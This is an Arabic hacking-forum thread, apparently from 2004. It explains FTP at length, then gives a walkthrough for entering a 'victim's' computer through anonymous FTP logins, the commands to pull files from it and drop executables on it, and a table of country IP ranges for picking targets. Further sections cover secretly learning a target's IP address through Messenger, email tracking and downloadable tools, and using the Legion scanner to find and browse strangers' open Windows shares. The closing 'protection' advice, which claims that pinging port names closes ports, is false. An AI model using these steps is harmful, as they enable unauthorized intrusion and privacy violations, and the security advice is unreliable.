هجوم الدوس المخيف راااااااااااااااائع للاختراق بدون برامج

[ssamad2006]

لسلام عليكم و رحمة الله و بركاته

اقدم لكم شرح ممل جدا لاختراق الدوس على عدة دروس و المعروف و الاسم الادق

(اختراق الftp اختصار file transfeer protocol)............


مقدمة

ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology).


ملاحظة:

قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه.

ماهو نقل الملفات FTP?

FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا.

ما هي خدمة بروتوكول نقل الملفات

يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت.

ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم.

وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM.


FTP الخادم و FTP المستفيد


تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) .

ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: ".gif، و .jpg"، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: ".hqx، و .uu". وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز "00"، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع.

ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت.



المستخدم (anonymous FTP)


تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها.

لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟

تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر.

أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو:

• تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب.


• تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم.


• تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.


_-_Bonz0_-_ 04-18-2004 09:21 PM

--------------------------------------------------------------------------------

علاقة (FTP) مع البريد الإلكتروني:

بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP):



ftpmail@ppa.dec.com
ftpmail@decwrl.dec.com
ftpmail@src.doc.ic.ac.uk



لولوج إلى (FTP) عن طريق مستعرضات الويب

تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة.


برامج مستفيد FTP


يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يوني** (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يوني** (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP).

كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج:



• البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows).


• البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh).


أقسام نقل الملفات:

نقل الملفات ينقسم الى قسمين:

===================

تنزيل الملفات Download:

وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local.

ارسال الملفات Uplaod:

وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host.

ومن الناحية الأمنية فهناك نوعان لنقل الملفات:

نقل مؤمن Secure FTP:


تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف.


نقل مجهول Anonymous FTP:


لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما.

تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام:

ملكية عامة Public Domain:


وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها.


مصادر مجانية Freeware:


يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها.


مصادر مشتركة Shareware:


يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها.

FTP والفيروسات:


يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين:


ASCII:


اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ.


Binary:


وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع.

والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg & gif & bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها.

طريقة نقل الملفات FTP:

هناك طرق عديدة لنقل الملفات وهي:

نقل الملفات باستخدام نظام UNIX


تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX:



ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.

binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر.

status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary.

help: لعرض قائمة بأوامر UNIX.

dir: عرض محتويات الدليل

ls: عرض محتويات الدليل الحالي.

cd directory: تغيير الدليل.

get filename: جلب الملف المطلوب وانزاله على جهازك.

mget filename:جلب مجموعة من الملفات.

pwd: طباعة الدليل الحالي.

bye: انهاء الارتباط والخروج من النظام البعيد.



نقل الملفات باستخدام حساب Shell:

أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال "IronPrivate"، ثم نقوم بادخال الرقم السري وهو مثلاً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة.

نقل الملفات باستخدام المتصفح Browser:

نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله.

نقل الملفات باستخدام حساب SLIP/PPP:

أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp.

- استخدام برنامج Ws_ftp LE 5.06:

ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK.

_-_Bonz0_-_ 04-18-2004 09:21 PM

--------------------------------------------------------------------------------


نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet:

Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالأوامر اللازمة.

استخدام برنامج Telnet من Windows:

ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit.

=========

الاختراق :

=======

FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور
21
مفتوح و هو البور الخاص ب
FTP
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها


Superscanne


بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
ؤوكي لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
سوف تتحصل عب النتيجة التالية
FTP>
To
أكتب بجانب
To
رقم الإبي للضحية ثم إضغط على إدخال
و الآن خد بالك معي

إدا تحصلت على هدا الرد فقد تخطيت خطوة


Connected to https://www.assassin.com/
220 websrv1 Microsoft FTP Service (Version 4.0).


و الآن أكتب الكتابة التالية


ftp>quote user ftp


إدا تحصلت على هدا الرد فقد تخطيت خطوة


331 Anonymous acces allowed, send identify (e-mail name) as password.


و الآن أكتب الكتابة التالية


ftp>quote cwd ~root


إذا تحصلت على هدا الرد فقد تخطيت خطوة


530 Please login with USER and PASS


ثم أكتب الكتابة التالية


ftp>quote pass ftp


إدا تحصلت على هدا الرد فقد تخطيت خطوة
و نجحت في الإقتحام

230 Anonymous user logged in.


مبروك أنت الآن في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الف تي بي


هذه هى اوامر الاف تى بى مبسطة لاستخدامها فى نقل ملفات من و الى الضحية و غير ذلك


Pwd


لكي تعر ما يحتويه الهارد ديسك


Cd


لإقتحام مجلد مثال


Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك

Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك

Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe


Put
العملية الع**ية ل Get

يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe

Clos
لقطع الإتصال مع الضحية

رقام ايبيهات الدول

الكاتب : لا اعرف



Egypt 62.135.127.255 62.135.0.0
Bahrain 193.188.127.255 193.188.96.0
Oman 212.72.31.255 212.72.0.0
United Arab Emirates 217.165.255.255 217.164.0.0
United Arab Emirates 195.229.255.255 195.229.0.0
United Arab Emirates 194.170.255.255 194.170.0.0
United Arab Emirates 213.42.255.255 213.42.0.0
Jordan 212.118.31.255 212.118.0.0
Jordan 217.23.47.255 217.23.32.0
Jordan 194.165.159.255 194.165.128.0
Jordan 193.188.95.255 193.188.64.0
Saudi Arabia 62.3.63.255 62.3.0.0
Saudi Arabia 212.2.255.255 212.2.224.0
Saudi Arabia 213.238.31.255 213.238.0.0
Saudi Arabia 213.184.191.255 213.184.160.0
Saudi Arabia 212.93.223.255 212.93.192.0
Saudi Arabia 212.70.63.255 212.70.32.0
Saudi Arabia 217.8.79.255 217.8.64.0
Saudi Arabia 213.165.63.255 213.165.32.0
Saudi Arabia 212.102.31.255 212.102.0.0
Saudi Arabia 213.230.31.255 213.230.0.0
Saudi Arabia 212.33.191.255 212.33.160.0
Saudi Arabia 212.26.127.255 212.26.0.0
Lebanon 62.84.95.255 62.84.64.0
Kuwait 62.215.255.255 62.215.0.0
Kuwait 195.226.255.255 195.226.224.0
Kuwait 195.39.191.255 195.39.128.0
Kuwait 62.100.223.255 62.100.192.0
Kuwait 194.126.63.255 194.126.32.0
Kuwait 194.54.255.255 194.54.192.0
Kuwait 213.189.95.255 213.189.64.0
Kuwait 62.150.255.255 62.150.0.0
Malaysia 210.186.127.255 210.186.0.0
Iceland 217.9.143.255 217.9.128.0
Portugal 213.13.255.255 213.13.0.0
Pakistan 203.135.63.255 203.135.32.0
Denmark 62.135.255.255 62.135.128.0
Ukraine 217.9.15.255 217.9.0.0
Russian Federation 62.5.255.255 62.5.128.0
Russian Federation 212.118.63.255 212.118.32.0
Japan 61.21.255.255 61.21.0.0
India 61.1.255.255 61.0.0.0
Poland 213.17.255.255 213.17.128.0
Poland 217.9.175.255 217.9.160.0
Poland 217.9.191.255 217.9.176.0
Lithuania 217.9.255.255 217.9.240.0
Hungary 213.16.127.255 213.16.64.0
Turkey 213.14.255.255 213.14.0.0
Turkey 62.248.127.255 62.248.0.0
Turkey 195.175.255.255 195.174.0.0
Sweden 213.15.255.255 213.15.0.0
Sweden 62.5.127.255 62.5.0.0
France 213.11.255.255 213.11.0.0
France 80.15.255.255 80.8.0.0
France 213.16.31.255 213.16.0.0
France 213.19.127.255 213.19.0.0
Bulgaria 213.16.63.255 213.16.32.0
Switzerland 213.230.63.255 213.230.32.0
Switzerland 213.3.255.255 213.3.0.0
Great Britain 213.230.127.255 213.230.64.0
Great Britain 212.106.63.255 212.106.32.0
Great Britain 62.3.127.255 62.3.64.0
Great Britain 213.12.255.255 213.12.0.0
Great Britain 213.18.255.255 213.18.0.0
Great Britain 213.230.255.255 213.230.192.0
Great Britain 213.1.255.255 213.1.0.0
Great Britain 213.2.255.255 213.2.0.0
Italy 213.230.159.255 213.230.128.0
Italy 213.21.191.255 213.21.128.0
Italy 62.152.159.255 62.152.128.0
Norway 213.230.191.255 213.230.160.0
Netherlands 213.10.255.255 213.10.0.0
Netherlands 213.17.127.255 213.17.0.0
Netherlands 24.132.255.255 24.132.0.0
Netherlands 213.19.255.255 213.19.128.0
Greece 213.5.255.255 213.5.0.0
Greece 213.16.255.255 213.16.128.0
Germany 213.7.255.255 213.6.0.0
Germany 62.84.63.255 62.84.32.0
Germany 213.20.255.255 213.20.0.0
Germany 213.21.127.255 213.21.0.0
Germany 213.9.127.255 213.9.0.0
Israel 213.8.255.255 213.8.0.0
Israel 80.230.255.255 80.230.0.0
Israel 192.118.7.255 192.118.4.0
Israel 192.118.11.255 192.118.8.0
Israel 212.179.255.255 212.179.0.0
Israel 192.118.15.255 192.118.12.0
Israel 212.116.191.255 212.116.160.0
Israel 212.199.255.255 212.199.0.0
Israel 213.189.63.255 213.189.32.0
Israel 213.8.255.255 213.8.0.0
Philippines 203.215.95.255 203.215.64.0
Spain 213.9.255.255 213.9.128.0
Spain 62.151.255.255 62.151.0.0

للفائده يااخواني
ولا تسيئون الاستخدام




هنا طريقة معرفة الـ IP للضحية

======


الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر
-----------------------------------

في البداية أرسل للضحيه اي ملف او صورة او اي شيء

وبعد ما توصل بنجاح

تروح تفتح الدوس وطريقه فتحه كالآتي

تروح لــــ START ثم RUN وتكتب command أو Dosprmpt

بعد ماتفتح شاشه الدوس السوداء

تكتب هذا الأمر netstat -n

مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n

بعد كتابه الأمر يطلعك الشكل الأتي :-

Proto -- Local Address -- Foreign Addres -- State


Local Address هذا رقم الاي بي الخاص بيك انت
Foreign Address هنا تحصل رقم الاي بي حق الضحية اخر رقم فيهم
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت
بس

الطريقة الثانيه من خلال الماسنجير
=======================
من خلال هذا الرابط
https://www.geocities.com/mondysite/mesn.zip

طريقة البرنامج

افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك

بعدين اظغط الزر اللي تحته

convert IP address

بعدين اظغط على الزر Listen

بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر

وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى

وبكذا تكون وفرت على نفسك ارسال اي ملفات

=================================================


الطريقة الثالثة
===========
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall -

ZONE ALARM - BLACK ICE

1-تجيب الIP الخاص بك ثم

2- تكتب الIP الخاص بك بالشكل هذا

https:// 212.34.34.78

3- طبعا الارقام الي فوق افتراضية

4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه

الضغط عليه

5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت

6- برنامج الف*** وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله

=================================================

الطريقة الرابعة عن طريق الإيميل
======================
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر
confirm.TO
يعني اذا فرضنا بريد الي تبي ترسل له

ali*************

يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل

ali*************.confirm.TO

وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به
وطبعا هو ما راح يعرف

==================================================







=========

الطريقة الخامسة عن طريق الإيميل ايضا
===========================

لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP حقه من رسالته في ((HOTMAIL))


من بريد الــHOTMAIL أختر options

بعدين اختر Mail Display Settings

بعدين massage headers

وغير الاختيار الى advanced

الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة

وبعض المعلومات الأخرى
==================================================







============

الطريقة السادسة عن طريق برنامج ICQ
==========================
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج

https://www.geocities.com/mondysite/ICQ_IP.zip

تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده

وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي حقه

هذه اسهل طريقة

==================================================







=============

الطريقة السابعة اظهار رقم ال IP للمواقع
==========================

تقوم تفتح شاشه الدوس وتكتب الأمر التالي


ping -wwww.xxxxxxxxx.com

ومكان xxxxxxx تحط اسم الموقع

هاذي الطريقه تطلع IP الموقع


من منكم و صل الى مرحلة الاخترق من دون باتش القليل فقط

رغم انها سهلة جداً طبعاً هذا درس صغير لتعليمك و هو جزء من اجزاء كثير نبداء

بسم الله الرحمن الرحيم

الأختراق بدون باتش و الحماية منه

هذه الطريقة تسمى طريقه المشاركة في الملفات والطابعة.

و لكن قبل بدء الاختراق يجب ان يتوافر شرط واحد لبدء الاختراق و هو

يجب أن يكون على نظامك عميل يسمى . Microsoft Networks

و طريقة اضافته كالتالى:

اضغط على زر ابدأ START

ومن ثم إعدادات . Settings

ومن ثم لوحة التحكم . Control Panel

ومن ثم بالنقر على أيقونة شبكات . Networks

سوف تظهر معك شاشة الاضافه ، اضغط على كلمة عميل . Client

ستظهر معك شاشة اختيار نوع العميل الذي تريد اضافته ، اضغط على شركة Microsoft

ومن ثم اختر العميل Client for Microsoft Networks

ومن ثم اضغظ موافق ، بعدها سيطلب منك ادخال قرص الويندوز

لتحميل بعض الملفات وبعدها يطلب منك اعادة التشغيل ، اختر لا لكي لا يعيد النظام التشغيل .

سترجع الى شاشة اعداد الشبكات مرة اخرى ، اضغط على زر مشاركة بالملفات الطابعة .

ضع صح على كل من :

اريد أن اكون قادرا على إعطاء الاخرين حق الوصول الى ملفاتي.

I want to be able to give others access my files

اريد أن اكون قادرا على السماح للآخرين بالطباعة على طابعتي .

I want to be able to allow to others to print on my printers

· اضغط علىموافق ، وبهدها أغلق اعدادات الشبكة .

· سترجع الى شاشة لوحة التحكم ، اضغط على ايقونة كلمات المرور ( احمر Passwords )

· ستظهر معك شاشة كلمات السر ، قم انقر على ايقونه Remote Administration .

· ضع علامه صح على Enable remote administration of this server


وبعدها ادخل أي كلمة سرية مرتين ومن ثم موافق

. الغرض من هذه الخطوة كي لا يتمكن أحد من الوصول الى ملفاتك وطابعتك الا بالكلمة السرية التي أنت وضعتها

الان حققت الشرط الازم للاختراق وبقي عليك الطريقة لكي تصل الى ملفات غيرك على الانترنت .

==> الاختراق <==

اولا يجب عليك تحميل البرنامج المستخدم و هو Legion

(ملاحظة : البرنامج ليس لدى الان ولكن تستطيع البحث عنه في جوجول )

بعد تشغيلك للبرنامج سوف يظهر لك قائمتين . القائمة اليسرى يظهر لك أرقام الايبي

المصطاده والقائمة اليمنى يعرض لك فيها بيانات كل ايبي وماهي السواقات والطابعات

المشاركة وفي الاعلى هناك 4 مربعات فارغة لك تطلب منك ادخال المدى

الذي تريد البحث فيه ، على سبيل المثال نريد البحث في المدى 212.64.130.1

. بعد ان تملى المربعات اضغط على زر scan لكي تبدأ البحث

سوف يبدأ البرنامج في البحث وسوف يظهر لك ارقام الايبي التي حصل عليها في

القائمة اليسرى ، وبعد ان ينتهي من البحث سوف يقوم بفحص كل ايبي حصل

عليه لكي يظهر لك ما بداخل كل ايبي من سواقات وطابعات ومشاركة ، وسوف يضعها لك في القائمة اليمنى .

فلنفرض أنه اصطاد سواقات على احدى ارقام الايبي عندها سيعرض لك البيانات كالمثال التالي :

Shared resources at //212.64.130.55

Sharename Type Comment

ــــــــــــــــــــــــــــــــــــــــــــــــــ
ــــــــ

ATL OPS STUF Disk

C Disk

DC ROM Disk

DC STUFF DISK

FMPRO Disk

JW STUFF Disk

The command was completed successfully .


اذا ظهرت لك بيانات على أي رقم كالبيانات السابقة انسخ رقم الايبي .

بعدها اضغط على زر ابدأ . (START)

اختر تشغيل . (RUN)

ثم اكتب رقم الايبي

ــــــــــــــــــــــــــــــــــــــــــــــــــ
ـــــــــــ

عندها سوف يفتح لك نافذه كنافذه المستكشف (Explorer)

ويضع فيها سواقات الجهاز الذي أنت بداخلة الآن ، اختر أي سواقة تريد .

==> كيف تحمي نفسك من الاختراق <==

اذا كنت مبتدء وتريد حمايه جهازك وملفاتك على الانترنت من هذه الطريقه فامسح العميل

Microsoft Network من اعدادات الشبكة ، وسوف يكون جهازك بامان تام ان شاء الله

امنع اى شخص من الدخول الى جهازك عبر الدوس


بسم الله الرحمن الرحيم

هتقفل جميع البورتات ال على الجهاز بتاعك

اولاا قم بفتح الدوس

اولاا ستار
تانى حاجه رن
تالت شى command

قم بالاتى

اول شى قم بكتابت الاتى

ping host

تانى شى

ping port80
تالت شى
ping port139
رابع شى
ping port23
خامس شى
ping host
ولحظ كدا مفيش اى شى يقدر
يخش من الدوس

 

 

[Nathyaa]

الله يعطيك مليون عافيه

[ssamad2006]

والله يعطيــك العافيـــه Nathyaa

